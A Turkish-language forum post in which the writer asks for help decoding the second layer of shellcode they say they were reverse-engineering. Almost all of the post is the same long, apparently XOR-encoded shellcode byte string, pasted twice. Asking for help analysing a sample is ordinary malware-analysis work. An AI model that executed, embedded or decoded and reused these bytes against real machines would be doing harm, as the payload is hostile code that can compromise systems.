Dün gece shellcode reverse engineer ettim ve payload kısmı base64 ile şifrelenmişti onu decode ettim ve decode ettikten sonra başka bir kısım çıktı ve onu decode edemedim yardım ederseniz çok sevinirim kod burda byte array yada opcode ile şifrelenmiş galiba tam bilemedim sizde yardımcı olurmusunuz anlamadım FİKRİNİZ VARSA BİLE SÖYLEYİN
KOD :
0xbd\0x7d\0x92\0xc2\0x70\0xd9\0xe9\0xd9\0x74\0x24\0xf4\0x5e\0x33\0xc9\0xb1\0x47\0x31\0x6e\0x13\0x03\0x6e\0x13\0x83\0xee\0x81\0x70\0x37\0x8c\0x91\0xf7\0xb8\0x6d\0x61\0x98\0x31\0x88\0x50\0x98\0x26\0xd8\0xc2\0x28\0x2c\0x8c\0xee\0xc3\0x60\0x25\0x65\0xa1\0xac\0x4a\0xce\0x0c\0x8b\0x65\0xcf\0x3d\0xef\0xe4\0x53\0x3c\0x3c\0xc7\0x6a\0x8f\0x31\0x06\0xab\0xf2\0xb8\0x5a\0x64\0x78\0x6e\0x4b\0x01\0x34\0xb3\0xe0\0x59\0xd8\0xb3\0x15\0x29\0xdb\0x92\0x8b\0x22\0x82\0x34\0x2d\0xe7\0xbe\0x7c\0x35\0xe4\0xfb\0x37\0xce\0xde\0x70\0xc6\0x06\0x2f\0x78\0x65\0x67\0x80\0x8b\0x77\0xaf\0x26\0x74\0x02\0xd9\0x55\0x09\0x15\0x1e\0x24\0xd5\0x90\0x85\0x8e\0x9e\0x03\0x62\0x2f\0x72\0xd5\0xe1\0x23\0x3f\0x91\0xae\0x27\0xbe\0x76\0xc5\0x53\0x4b\0x79\0x0a\0xd2\0x0f\0x5e\0x8e\0xbf\0xd4\0xff\0x97\0x65\0xba\0x00\0xc7\0xc6\0x63\0xa5\0x83\0xea\0x70\0xd4\0xc9\0x62\0xb4\0xd5\0xf1\0x72\0xd2\0x6e\0x81\0x40\0x7d\0xc5\0x0d\0xe8\0xf6\0xc3\0xca\0x0f\0x2d\0xb3\0x45\0xee\0xce\0xc4\0x4c\0x34\0x9a\0x94\0xe6\0x9d\0xa3\0x7e\0xf7\0x22\0x76\0xea\0xfd\0xb4\0x26\0xee\0xbb\0x0b\0xb1\0xf2\0xbb\0x92\0xfa\0x7a\0x5d\0xc4\0xac\0x2c\0xf2\0xa4\0x1c\0x8d\0xa2\0x4c\0x77\0x02\0x9c\0x6c\0x78\0xc8\0xb5\0x06\0x97\0xa5\0xee\0xbe\0x0e\0xec\0x65\0x5f\0xce\0x3a\0x00\0x5f\0x44\0xc9\0xf4\0x11\0xad\0xa4\0xe6\0xc5\0x5d\0xf3\0x55\0x43\0x61\0x29\0xf3\0x6b\0xf7\0xd6\0x52\0x3c\0x6f\0xd5\0x83\0x0a\0x30\0x26\0xe6\0x01\0xf9\0xb2\0x49\0x7d\0x06\0x53\0x4a\0x7d\0x50\0x39\0x4a\0x15\0x04\0x19\0x19\0x00\0x4b\0xb4\0x0d\0x99\0xde\0x37\0x64\0x4e\0x48\0x50\0x8a\0xa9\0xbe\0xff\0x75\0x9c\0x3e\0xc3\0xa3\0xd8\0x34\0x2d\0x70
KOD :
0xbd\0x7d\0x92\0xc2\0x70\0xd9\0xe9\0xd9\0x74\0x24\0xf4\0x5e\0x33\0xc9\0xb1\0x47\0x31\0x6e\0x13\0x03\0x6e\0x13\0x83\0xee\0x81\0x70\0x37\0x8c\0x91\0xf7\0xb8\0x6d\0x61\0x98\0x31\0x88\0x50\0x98\0x26\0xd8\0xc2\0x28\0x2c\0x8c\0xee\0xc3\0x60\0x25\0x65\0xa1\0xac\0x4a\0xce\0x0c\0x8b\0x65\0xcf\0x3d\0xef\0xe4\0x53\0x3c\0x3c\0xc7\0x6a\0x8f\0x31\0x06\0xab\0xf2\0xb8\0x5a\0x64\0x78\0x6e\0x4b\0x01\0x34\0xb3\0xe0\0x59\0xd8\0xb3\0x15\0x29\0xdb\0x92\0x8b\0x22\0x82\0x34\0x2d\0xe7\0xbe\0x7c\0x35\0xe4\0xfb\0x37\0xce\0xde\0x70\0xc6\0x06\0x2f\0x78\0x65\0x67\0x80\0x8b\0x77\0xaf\0x26\0x74\0x02\0xd9\0x55\0x09\0x15\0x1e\0x24\0xd5\0x90\0x85\0x8e\0x9e\0x03\0x62\0x2f\0x72\0xd5\0xe1\0x23\0x3f\0x91\0xae\0x27\0xbe\0x76\0xc5\0x53\0x4b\0x79\0x0a\0xd2\0x0f\0x5e\0x8e\0xbf\0xd4\0xff\0x97\0x65\0xba\0x00\0xc7\0xc6\0x63\0xa5\0x83\0xea\0x70\0xd4\0xc9\0x62\0xb4\0xd5\0xf1\0x72\0xd2\0x6e\0x81\0x40\0x7d\0xc5\0x0d\0xe8\0xf6\0xc3\0xca\0x0f\0x2d\0xb3\0x45\0xee\0xce\0xc4\0x4c\0x34\0x9a\0x94\0xe6\0x9d\0xa3\0x7e\0xf7\0x22\0x76\0xea\0xfd\0xb4\0x26\0xee\0xbb\0x0b\0xb1\0xf2\0xbb\0x92\0xfa\0x7a\0x5d\0xc4\0xac\0x2c\0xf2\0xa4\0x1c\0x8d\0xa2\0x4c\0x77\0x02\0x9c\0x6c\0x78\0xc8\0xb5\0x06\0x97\0xa5\0xee\0xbe\0x0e\0xec\0x65\0x5f\0xce\0x3a\0x00\0x5f\0x44\0xc9\0xf4\0x11\0xad\0xa4\0xe6\0xc5\0x5d\0xf3\0x55\0x43\0x61\0x29\0xf3\0x6b\0xf7\0xd6\0x52\0x3c\0x6f\0xd5\0x83\0x0a\0x30\0x26\0xe6\0x01\0xf9\0xb2\0x49\0x7d\0x06\0x53\0x4a\0x7d\0x50\0x39\0x4a\0x15\0x04\0x19\0x19\0x00\0x4b\0xb4\0x0d\0x99\0xde\0x37\0x64\0x4e\0x48\0x50\0x8a\0xa9\0xbe\0xff\0x75\0x9c\0x3e\0xc3\0xa3\0xd8\0x34\0x2d\0x70
